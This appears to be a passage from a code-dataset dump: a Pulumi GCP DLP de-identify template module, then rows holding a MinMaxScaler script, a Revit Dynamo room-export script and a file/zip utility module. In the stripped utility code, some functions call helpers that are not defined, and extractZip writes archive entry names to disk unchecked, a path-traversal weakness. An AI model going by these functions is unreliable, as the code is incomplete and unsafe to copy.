* [Official Documentation](https://cloud.google.com/dlp/docs/concepts-templates)
## Example Usage
### Dlp Deidentify Template Basic
```python
import pulumi
import pulumi_gcp as gcp
basic = gcp.dataloss.PreventionDeidentifyTemplate("basic",
deidentify_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigArgs(
info_type_transformations=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsArgs(
transformations=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="FIRST_NAME",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_with_info_type_config=True,
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="PHONE_NUMBER",
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="AGE",
),
],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigArgs(
new_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueArgs(
integer_value=9,
),
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="EMAIL_ADDRESS",
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="LAST_NAME",
),
],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
character_mask_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCharacterMaskConfigArgs(
characters_to_ignore=[{
"commonCharactersToIgnore": "PUNCTUATION",
}],
masking_character="X",
number_to_mask=4,
reverse_order=True,
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="DATE_OF_BIRTH",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
replace_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigArgs(
new_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueArgs(
date_value=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationReplaceConfigNewValueDateValueArgs(
day=1,
month=1,
year=2020,
),
),
),
),
),
gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationArgs(
info_types=[gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationInfoTypeArgs(
name="CREDIT_CARD_NUMBER",
)],
primitive_transformation=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationArgs(
crypto_deterministic_config=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigArgs(
context=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigContextArgs(
name="sometweak",
),
crypto_key=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigCryptoKeyArgs(
transient=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigCryptoKeyTransientArgs(
name="beep",
),
),
surrogate_info_type=gcp.dataloss.PreventionDeidentifyTemplateDeidentifyConfigInfoTypeTransformationsTransformationPrimitiveTransformationCryptoDeterministicConfigSurrogateInfoTypeArgs(
name="abc",
),
),
),
),
],
),
),
description="Description",
display_name="Displayname",
parent="projects/my-project-name")
```
## Import
DeidentifyTemplate can be imported using any of these accepted formats
```sh
$ pulumi import gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate default {{parent}}/deidentifyTemplates/{{name}}
```
```sh
$ pulumi import gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate default {{parent}}/{{name}}
```
:param str resource_name: The name of the resource.
:param PreventionDeidentifyTemplateArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(PreventionDeidentifyTemplateArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deidentify_config: Optional[pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = PreventionDeidentifyTemplateArgs.__new__(PreventionDeidentifyTemplateArgs)
if deidentify_config is None and not opts.urn:
raise TypeError("Missing required property 'deidentify_config'")
__props__.__dict__["deidentify_config"] = deidentify_config
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
if parent is None and not opts.urn:
raise TypeError("Missing required property 'parent'")
__props__.__dict__["parent"] = parent
__props__.__dict__["name"] = None
super(PreventionDeidentifyTemplate, __self__).__init__(
'gcp:dataloss/preventionDeidentifyTemplate:PreventionDeidentifyTemplate',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
deidentify_config: Optional[pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parent: Optional[pulumi.Input[str]] = None) -> 'PreventionDeidentifyTemplate':
"""
Get an existing PreventionDeidentifyTemplate resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['PreventionDeidentifyTemplateDeidentifyConfigArgs']] deidentify_config: Configuration of the deidentify template
Structure is documented below.
:param pulumi.Input[str] description: A description of the template.
:param pulumi.Input[str] display_name: User set display name of the template.
:param pulumi.Input[str] name: Name of the information type. Either a name of your choosing when creating a CustomInfoType, or one of the names listed at [https://cloud.google.com/dlp/docs/infotypes-reference](https://cloud.google.com/dlp/docs/infotypes-reference) when specifying a built-in type. When sending Cloud DLP results to Data Catalog, infoType names should conform to the pattern `[A-Za-z0-9$-_]{1,64}`.
:param pulumi.Input[str] parent: The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _PreventionDeidentifyTemplateState.__new__(_PreventionDeidentifyTemplateState)
__props__.__dict__["deidentify_config"] = deidentify_config
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["name"] = name
__props__.__dict__["parent"] = parent
return PreventionDeidentifyTemplate(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="deidentifyConfig")
def deidentify_config(self) -> pulumi.Output['outputs.PreventionDeidentifyTemplateDeidentifyConfig']:
"""
Configuration of the deidentify template
Structure is documented below.
"""
return pulumi.get(self, "deidentify_config")
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description of the template.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[str]]:
"""
User set display name of the template.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the information type. Either a name of your choosing when creating a CustomInfoType, or one of the names listed at [https://cloud.google.com/dlp/docs/infotypes-reference](https://cloud.google.com/dlp/docs/infotypes-reference) when specifying a built-in type. When sending Cloud DLP results to Data Catalog, infoType names should conform to the pattern `[A-Za-z0-9$-_]{1,64}`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parent(self) -> pulumi.Output[str]:
"""
The parent of the template in any of the following formats:
* `projects/{{project}}`
* `projects/{{project}}/locations/{{location}}`
* `organizations/{{organization_id}}`
* `organizations/{{organization_id}}/locations/{{location}}`
"""
return pulumi.get(self, "parent")
| 3,046 | 30,037 | 67 |
8507de2c30bd2745a0276ae3c30b8e452c32e14f | 486 | py | Python | processing/MinMaxScaler.py | lkhphuc/slack-visual-summary | 59c88580d95222718dd5c260eb1eacd01e3eeb35 | [
"MIT"
] | 2 | 2018-08-14T09:11:33.000Z | 2019-09-17T18:25:26.000Z | processing/MinMaxScaler.py | lkhphuc/slack-visual-summary | 59c88580d95222718dd5c260eb1eacd01e3eeb35 | [
"MIT"
] | null | null | null | processing/MinMaxScaler.py | lkhphuc/slack-visual-summary | 59c88580d95222718dd5c260eb1eacd01e3eeb35 | [
"MIT"
] | null | null | null | from sklearn.preprocessing import MinMaxScaler
from numpy import loadtxt
import numpy as np
import matplotlib as plt
import pandas as pd
from numpy import reshape
data = loadtxt('data-time.txt')
print(data)
#redata = np.reshape(-1,1)
#print(redata)
scaler = MinMaxScaler()
print(scaler.fit(data))
MinMaxScaler(copy=True, feature_range=(0, 100))
print(scaler.data_max_)
a = scaler.transform(data)
np.savetxt('time-scale.txt', a,fmt='%.6f')
print(a)
#print(scaler.transform([[2, 2]]))
| 23.142857 | 47 | 0.751029 | from sklearn.preprocessing import MinMaxScaler
from numpy import loadtxt
import numpy as np
import matplotlib as plt
import pandas as pd
from numpy import reshape
data = loadtxt('data-time.txt')
print(data)
#redata = np.reshape(-1,1)
#print(redata)
scaler = MinMaxScaler()
print(scaler.fit(data))
MinMaxScaler(copy=True, feature_range=(0, 100))
print(scaler.data_max_)
a = scaler.transform(data)
np.savetxt('time-scale.txt', a,fmt='%.6f')
print(a)
#print(scaler.transform([[2, 2]]))
| 0 | 0 | 0 |
0fe5f55b94767e2765b101413f36d3b004c94b0e | 3,710 | py | Python | roomInformationExport.py | ruornil/revitDynamoScripts | dc01db653a721136da4e3f99469df4e06becb767 | [
"MIT"
] | null | null | null | roomInformationExport.py | ruornil/revitDynamoScripts | dc01db653a721136da4e3f99469df4e06becb767 | [
"MIT"
] | null | null | null | roomInformationExport.py | ruornil/revitDynamoScripts | dc01db653a721136da4e3f99469df4e06becb767 | [
"MIT"
] | null | null | null | #Copyright(c) 2015, Nathan Miller
# The Proving Ground, http://theprovingground.org
#Edited and modified by Mehmet Cenk Tunaboylu, to better suit his needs. Removed boundary curves extraction. Added department extraction.
import clr
# Import RevitAPI
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
# Import DocumentManager and TransactionManager
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
# Import ToDSType(bool) extension method
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.ImportExtensions(Revit.GeometryConversion)
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
#The input to this node will be stored in the IN[0] variable.
doc = DocumentManager.Instance.CurrentDBDocument
app = DocumentManager.Instance.CurrentUIApplication.Application
toggle = IN[0]
output = []
rooms = ['TYPE']
names = ['ROOM NAME']
numbers = ['ROOM NUMBER']
areas = ['AREA']
levels = ['LEVEL']
locations = ['LOCATION']
elementids = ['ELEMENT ID']
uniqueids = ['UNIQUE ID']
roomStyles = ['ROOM STYLE']
baseFinishes = ['BASE FINISH']
floorFinishes = ['FLOOR FINISH']
wallFinishes = ['WALL FINISH']
ceilingFinishes = ['CEILING FINISH']
if toggle == True:
collector = FilteredElementCollector(doc)
collector.OfCategory(BuiltInCategory.OST_Rooms)
famtypeitr = collector.GetElementIdIterator()
famtypeitr.Reset()
for item in famtypeitr:
elmID = item
eleminst = doc.GetElement(elmID)
#print eleminst
if eleminst.Area > 0:
room = eleminst
roomname = ''
for p in room.Parameters:
if p.Definition.Name == 'Name':
roomname = p.AsString()
if p.Definition.Name == 'Level':
level = p.AsValueString()
if (level is None):
level = p.AsString()
if p.Definition.Name == 'Base Finish':
baseFinish = p.AsValueString()
if (baseFinish is None):
baseFinish = p.AsString()
if p.Definition.Name == 'Wall Finish':
wallFinish = p.AsValueString()
if (wallFinish is None):
wallFinish = p.AsString()
if p.Definition.Name == 'Floor Finish':
floorFinish = p.AsValueString()
if (floorFinish is None):
floorFinish = p.AsString()
if p.Definition.Name == 'Ceiling Finish':
ceilingFinish = p.AsValueString()
if (ceilingFinish is None):
ceilingFinish = p.AsString()
if p.Definition.Name == 'Room Style':
roomStyle = p.AsValueString()
if (roomStyle is None):
roomStyle = p.AsString()
number = eleminst.Number
area = eleminst.Area
location = eleminst.Location.Point.ToPoint()
elementid = eleminst.Id.ToString()
uniqueid = eleminst.UniqueId
uniqueids.append(uniqueid)
rooms.append(room)
numbers.append("xxx_"+number)
names.append(roomname)
areas.append(area)
levels.append(level)
roomStyles.append(roomStyle)
baseFinishes.append(baseFinish)
floorFinishes.append(floorFinish)
wallFinishes.append(wallFinish)
ceilingFinishes.append(ceilingFinish)
locations.append(location)
output.append(uniqueids)
output.append(rooms)
output.append(numbers)
output.append(names)
output.append(areas)
output.append(levels)
output.append(roomStyles)
output.append(baseFinishes)
output.append(floorFinishes)
output.append(wallFinishes)
output.append(ceilingFinishes)
output.append(locations)
#Assign your output to the OUT variable
OUT = output | 28.538462 | 138 | 0.695957 | #Copyright(c) 2015, Nathan Miller
# The Proving Ground, http://theprovingground.org
#Edited and modified by Mehmet Cenk Tunaboylu, to better suit his needs. Removed boundary curves extraction. Added department extraction.
import clr
# Import RevitAPI
clr.AddReference("RevitAPI")
import Autodesk
from Autodesk.Revit.DB import *
# Import DocumentManager and TransactionManager
clr.AddReference("RevitServices")
import RevitServices
from RevitServices.Persistence import DocumentManager
from RevitServices.Transactions import TransactionManager
# Import ToDSType(bool) extension method
clr.AddReference("RevitNodes")
import Revit
clr.ImportExtensions(Revit.Elements)
clr.ImportExtensions(Revit.GeometryConversion)
import clr
clr.AddReference('ProtoGeometry')
from Autodesk.DesignScript.Geometry import *
#The input to this node will be stored in the IN[0] variable.
doc = DocumentManager.Instance.CurrentDBDocument
app = DocumentManager.Instance.CurrentUIApplication.Application
toggle = IN[0]
output = []
rooms = ['TYPE']
names = ['ROOM NAME']
numbers = ['ROOM NUMBER']
areas = ['AREA']
levels = ['LEVEL']
locations = ['LOCATION']
elementids = ['ELEMENT ID']
uniqueids = ['UNIQUE ID']
roomStyles = ['ROOM STYLE']
baseFinishes = ['BASE FINISH']
floorFinishes = ['FLOOR FINISH']
wallFinishes = ['WALL FINISH']
ceilingFinishes = ['CEILING FINISH']
if toggle == True:
collector = FilteredElementCollector(doc)
collector.OfCategory(BuiltInCategory.OST_Rooms)
famtypeitr = collector.GetElementIdIterator()
famtypeitr.Reset()
for item in famtypeitr:
elmID = item
eleminst = doc.GetElement(elmID)
#print eleminst
if eleminst.Area > 0:
room = eleminst
roomname = ''
for p in room.Parameters:
if p.Definition.Name == 'Name':
roomname = p.AsString()
if p.Definition.Name == 'Level':
level = p.AsValueString()
if (level is None):
level = p.AsString()
if p.Definition.Name == 'Base Finish':
baseFinish = p.AsValueString()
if (baseFinish is None):
baseFinish = p.AsString()
if p.Definition.Name == 'Wall Finish':
wallFinish = p.AsValueString()
if (wallFinish is None):
wallFinish = p.AsString()
if p.Definition.Name == 'Floor Finish':
floorFinish = p.AsValueString()
if (floorFinish is None):
floorFinish = p.AsString()
if p.Definition.Name == 'Ceiling Finish':
ceilingFinish = p.AsValueString()
if (ceilingFinish is None):
ceilingFinish = p.AsString()
if p.Definition.Name == 'Room Style':
roomStyle = p.AsValueString()
if (roomStyle is None):
roomStyle = p.AsString()
number = eleminst.Number
area = eleminst.Area
location = eleminst.Location.Point.ToPoint()
elementid = eleminst.Id.ToString()
uniqueid = eleminst.UniqueId
uniqueids.append(uniqueid)
rooms.append(room)
numbers.append("xxx_"+number)
names.append(roomname)
areas.append(area)
levels.append(level)
roomStyles.append(roomStyle)
baseFinishes.append(baseFinish)
floorFinishes.append(floorFinish)
wallFinishes.append(wallFinish)
ceilingFinishes.append(ceilingFinish)
locations.append(location)
output.append(uniqueids)
output.append(rooms)
output.append(numbers)
output.append(names)
output.append(areas)
output.append(levels)
output.append(roomStyles)
output.append(baseFinishes)
output.append(floorFinishes)
output.append(wallFinishes)
output.append(ceilingFinishes)
output.append(locations)
#Assign your output to the OUT variable
OUT = output | 0 | 0 | 0 |
4da836cc685f5c603b5df612aa13b9c3f035b149 | 14,627 | py | Python | util.py | yinkaisheng/AgoraRteDemo | 512769e299ac19601589b0c4c154e012aea27ffb | [
"Apache-2.0"
] | 1 | 2022-03-03T14:40:53.000Z | 2022-03-03T14:40:53.000Z | util.py | yinkaisheng/AgoraRteDemo | 512769e299ac19601589b0c4c154e012aea27ffb | [
"Apache-2.0"
] | null | null | null | util.py | yinkaisheng/AgoraRteDemo | 512769e299ac19601589b0c4c154e012aea27ffb | [
"Apache-2.0"
] | null | null | null | #!python3
# -*- coding: utf-8 -*-
# author: yinkaisheng@foxmail.com
import os
import sys
import json
import ctypes
import pickle
import shutil
# import socket
import zipfile
import datetime
from typing import Any, Callable, Iterator, Dict, List, Tuple
_SelfFileName = os.path.split(__file__)[1]
def getStrBetween(src: str, left: str, right: str = None, start: int = 0, end: int = None) -> Tuple[str, int]:
'''return tuple (str, index), index is -1 if not found'''
if left:
s1start = src.find(left, start, end)
if s1start >= 0:
s1end = s1start + len(left)
if right:
s2start = src.find(right, s1end, end)
if s2start >= 0:
return src[s1end:s2start], s1end
else:
return '', -1
else:
return src[s1end:], s1end
else:
return '', -1
else:
if right:
s2start = src.find(right, end)
if s2start >= 0:
return src[:s2start], 0
else:
return '', -1
else:
return '', -1
TreeNode = Any
def walkTree(root, getChildren: Callable[[TreeNode], List[TreeNode]] = None,
getFirstChild: Callable[[TreeNode], TreeNode] = None, getNextSibling: Callable[[TreeNode], TreeNode] = None,
yieldCondition: Callable[[TreeNode, int], bool] = None, includeRoot: bool = False, maxDepth: int = 0xFFFFFFFF) -> Iterator:
"""
Walk a tree not using recursive algorithm.
root: a tree node.
getChildren: Callable[[TreeNode], List[TreeNode]], function(treeNode: TreeNode) -> List[TreeNode].
getNextSibling: Callable[[TreeNode], TreeNode], function(treeNode: TreeNode) -> TreeNode.
getNextSibling: Callable[[TreeNode], TreeNode], function(treeNode: TreeNode) -> TreeNode.
yieldCondition: Callable[[TreeNode, int], bool], function(treeNode: TreeNode, depth: int) -> bool.
includeRoot: bool, if True yield root first.
maxDepth: int, enum depth.
If getChildren is valid, ignore getFirstChild and getNextSibling,
yield 3 items tuple: (treeNode, depth, remain children count in current depth).
If getChildren is not valid, using getFirstChild and getNextSibling,
yield 2 items tuple: (treeNode, depth).
If yieldCondition is not None, only yield tree nodes that yieldCondition(treeNode: TreeNode, depth: int)->bool returns True.
For example:
def GetDirChildren(dir_):
if os.path.isdir(dir_):
return [os.path.join(dir_, it) for it in os.listdir(dir_)]
for it, depth, leftCount in WalkTree('D:\\', getChildren= GetDirChildren):
print(it, depth, leftCount)
"""
if maxDepth <= 0:
return
depth = 0
if getChildren:
if includeRoot:
if not yieldCondition or yieldCondition(root, 0):
yield root, 0, 0
children = getChildren(root)
childList = [children]
while depth >= 0: # or while childList:
lastItems = childList[-1]
if lastItems:
if not yieldCondition or yieldCondition(lastItems[0], depth + 1):
yield lastItems[0], depth + 1, len(lastItems) - 1
if depth + 1 < maxDepth:
children = getChildren(lastItems[0])
if children:
depth += 1
childList.append(children)
del lastItems[0]
else:
del childList[depth]
depth -= 1
elif getFirstChild and getNextSibling:
if includeRoot:
if not yieldCondition or yieldCondition(root, 0):
yield root, 0
child = getFirstChild(root)
childList = [child]
while depth >= 0: # or while childList:
lastItem = childList[-1]
if lastItem:
if not yieldCondition or yieldCondition(lastItem, depth + 1):
yield lastItem, depth + 1
child = getNextSibling(lastItem)
childList[depth] = child
if depth + 1 < maxDepth:
child = getFirstChild(lastItem)
if child:
depth += 1
childList.append(child)
else:
del childList[depth]
depth -= 1
def listDir(path: Tuple[str, bool, str]) -> List[Tuple[str, bool, str]]:
'''returns Tuple[filePath:str, isDir:bool, fileName:str]'''
if path[1]:
files = []
files2 = []
for it in os.listdir(path[0]):
childPath = os.path.join(path[0], it)
if os.path.isdir(childPath):
files.append((childPath, True, it))
else:
files2.append((childPath, False, it))
files.extend(files2)
return files
def copyDir(src: str, dst: str, log: bool = True) -> int:
"""return int, files count"""
if src[-1] == os.path.sep:
src = src[:-1]
if dst[-1] != os.path.sep:
dst = dst + os.sep
srcLen = len(src)
if not os.path.exists(dst):
os.makedirs(dst)
fileCount = 0
for filePath, isDir, fileName, depth, remainCount in walkDir(src):
relativeName = filePath[srcLen + 1:]
dstPath = dst + relativeName
if isDir:
if not os.path.exists(dstPath):
os.makedirs(dstPath)
if log:
print(f'create dir: {dstPath}')
else:
shutil.copyfile(filePath, dstPath) # dstPath's dir must exists, will over write dstPath if dstPath exists
fileCount += 1
if log:
print(f'copy file {fileCount}: {dstPath}')
def renameFilesInDir(src: str, find: str, replace: str, log: bool = True) -> int:
"""return int, files count that are renamed"""
fileCount = 0
for filePath, isDir, fileName, depth, remainCount in walkDir(src):
if not isDir:
newFileName = fileName.replace(find, replace)
if fileName != newFileName:
newFilePath = filePath[:len(filePath) - len(fileName)] + newFileName
if os.path.exists(newFilePath):
os.remove(newFilePath)
os.rename(filePath, newFilePath)
fileCount += 1
if log:
print(f'{fileCount}: {filePath}\n -> {newFilePath}, file renamed')
def walkZip(zipPath: str, getFileObjCondition: Callable[[zipfile.ZipInfo], bool] = None) -> Iterator[Tuple[bool, zipfile.ZipInfo, zipfile.ZipExtFile]]:
"""
getFileObjCondition: getFileObjCondition(fileName:str)->bool
return tuple(isDir:bool, zipInfo:ZipInfo, fileObj:ZipExtFile)
zipInfo.is_dir(), zipInfo.filename, ...
"""
with zipfile.ZipFile(zipPath, 'r') as zin:
for zipInfo in zin.infolist():
if zipInfo.is_dir():
yield True, zipInfo, None
else:
if getFileObjCondition and getFileObjCondition(zipInfo):
with zin.open(zipInfo.filename, 'r') as fin:
yield False, zipInfo, fin
# shutil.copyfileobj(fin, fout, 512000) # avoid too much memory, default 1MB if pass 0 to 3rd parameter
else:
yield False, zipInfo, None
def extractOneFileInZip(zipPath: str, dstDir: str, fileEnd: str, log: bool = True) -> bool:
"""
fileEnd: str.
dstDir: str, should end with \\(not must).
"""
if dstDir[-1] != os.sep:
dstDir = dstDir + os.sep
if not os.path.exists(dstDir):
os.makedirs(dstDir)
for isDir, zipInfo, zipFile in walkZip(zipPath, lambda zInfo: zInfo.filename.endswith(fileEnd)):
if zipFile:
dstPath = dstDir + os.path.basename(fileEnd)
with open(dstPath, 'wb') as fout:
shutil.copyfileobj(zipFile, fout)
if log:
print(f'copy file: {dstPath}')
return True
return False
def extractZip(zipPath: str, dstDir: str, subDir: str = None, log: bool = True) -> int:
"""
subDir: str, if None, extrac all contents to dstDir, if not None, must not be end with / and can not use \\ in subDir.
dstDir: str, should end with \\(not must).
returns int, files count.
"""
if dstDir[-1] != os.sep:
dstDir = dstDir + os.sep
fileCount = 0
if not subDir:
for isDir, zipInfo, zipFile in walkZip(zipPath, lambda zInfo: True):
if isDir:
dstPath = dstDir + zipInfo.filename
if not os.path.exists(dstPath):
os.makedirs(dstPath)
if log:
print(f'create dir: {dstPath}')
else:
dstPath = dstDir + zipInfo.filename
with open(dstPath, 'wb') as fout:
shutil.copyfileobj(zipFile, fout)
fileCount += 1
if log:
print(f'copy file {fileCount}: {dstPath}')
return fileCount
foundDir = False
for isDir, zipInfo, zipFile in walkZip(zipPath, checkFunc):
if isDir:
index = zipInfo.filename.find(subDir)
if not foundDir and index >= 0:
foundDir = True
if foundDir:
if index < 0:
break
createDir = dstDir + zipInfo.filename[index + len(subDir) + 1:]
if not os.path.exists(createDir):
os.makedirs(createDir)
if log:
print(f'create dir: {createDir}')
else:
if zipFile:
index = zipInfo.filename.find(subDir)
dstPath = dstDir + zipInfo.filename[index + len(subDir) + 1:]
with open(dstPath, 'wb') as fout:
shutil.copyfileobj(zipFile, fout)
fileCount += 1
if log:
print(f'copy file {fileCount}: {dstPath}')
else:
if foundDir:
break
return fileCount
# def getLocalIP() -> str:
# ip = ''
# try:
# s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# s.connect(('8.8.8.8', 80))
# ip = s.getsockname()[0]
# finally:
# s.close()
# return ip
if __name__ == '__main__':
print(1, 2, 3)
| 36.027094 | 162 | 0.569768 | #!python3
# -*- coding: utf-8 -*-
# author: yinkaisheng@foxmail.com
import os
import sys
import json
import ctypes
import pickle
import shutil
# import socket
import zipfile
import datetime
from typing import Any, Callable, Iterator, Dict, List, Tuple
_SelfFileName = os.path.split(__file__)[1]
def isPy38OrHigher():
return (sys.version_info[0] == 3 and sys.version_info[1] >= 8) or sys.version_info[0] > 3
def printx(*values, sep: str = ' ', end: str = None, flush: bool = False, caller: bool = True) -> None:
t = datetime.datetime.now()
if caller:
frameCount = 1
while True:
frame = sys._getframe(frameCount)
#_, scriptFileName = os.path.split(frame.f_code.co_filename)
scriptFileName = os.path.basename(frame.f_code.co_filename)
if scriptFileName != _SelfFileName:
break
frameCount += 1
timestr = f'{t.year}-{t.month:02}-{t.day:02} {t.hour:02}:{t.minute:02}:{t.second:02}.{t.microsecond // 1000:03} {frame.f_code.co_name}[{frame.f_lineno}]:'
else:
timestr = f'{t.year}-{t.month:02}-{t.day:02} {t.hour:02}:{t.minute:02}:{t.second:02}.{t.microsecond // 1000:03} :'
print(timestr, *values, sep=sep, end=end)
if flush and sys.stdout:
sys.stdout.flush()
def setConsoleTitle(title: str) -> None:
#need colorama.init
sys.stdout.write(f'\x1b]2;{title}\x07')
def getStrBetween(src: str, left: str, right: str = None, start: int = 0, end: int = None) -> Tuple[str, int]:
'''return tuple (str, index), index is -1 if not found'''
if left:
s1start = src.find(left, start, end)
if s1start >= 0:
s1end = s1start + len(left)
if right:
s2start = src.find(right, s1end, end)
if s2start >= 0:
return src[s1end:s2start], s1end
else:
return '', -1
else:
return src[s1end:], s1end
else:
return '', -1
else:
if right:
s2start = src.find(right, end)
if s2start >= 0:
return src[:s2start], 0
else:
return '', -1
else:
return '', -1
def getFileText(path: str, encoding: str = 'utf-8', checkExist: bool = True) -> str:
if checkExist and not os.path.exists(path):
return ''
with open(path, 'rt', encoding=encoding, errors='ignore') as fin:
return fin.read()
def writeTextFile(text: str, path: str, encoding: str = 'utf-8'):
with open(path, 'wt', encoding=encoding, errors='ignore') as fout:
fout.write(text)
def appendTextFile(text: str, path: str, encoding: str = 'utf-8'):
with open(path, 'a+', encoding=encoding, errors='ignore') as fout:
fout.write(text)
def pickleLoad(path: str) -> Any:
if os.path.exists(path):
with open(path, 'rb') as fin:
return pickle.load(fin)
def pickleDump(obj: Any, path: str):
with open(path, 'wb') as fout:
pickle.dump(obj, fout)
def jsonFromFile(path: str, encoding: str = 'utf-8') -> Dict:
content = getFileText(path, encoding)
return json.loads(content) if content else {}
def jsonToFile(jsonObj: Dict, path: str):
jsonStr = json.dumps(jsonObj, indent=4, ensure_ascii=False, sort_keys=False)
writeTextFile(jsonStr, path, encoding='utf-8')
TreeNode = Any
def walkTree(root, getChildren: Callable[[TreeNode], List[TreeNode]] = None,
getFirstChild: Callable[[TreeNode], TreeNode] = None, getNextSibling: Callable[[TreeNode], TreeNode] = None,
yieldCondition: Callable[[TreeNode, int], bool] = None, includeRoot: bool = False, maxDepth: int = 0xFFFFFFFF) -> Iterator:
"""
Walk a tree not using recursive algorithm.
root: a tree node.
getChildren: Callable[[TreeNode], List[TreeNode]], function(treeNode: TreeNode) -> List[TreeNode].
getNextSibling: Callable[[TreeNode], TreeNode], function(treeNode: TreeNode) -> TreeNode.
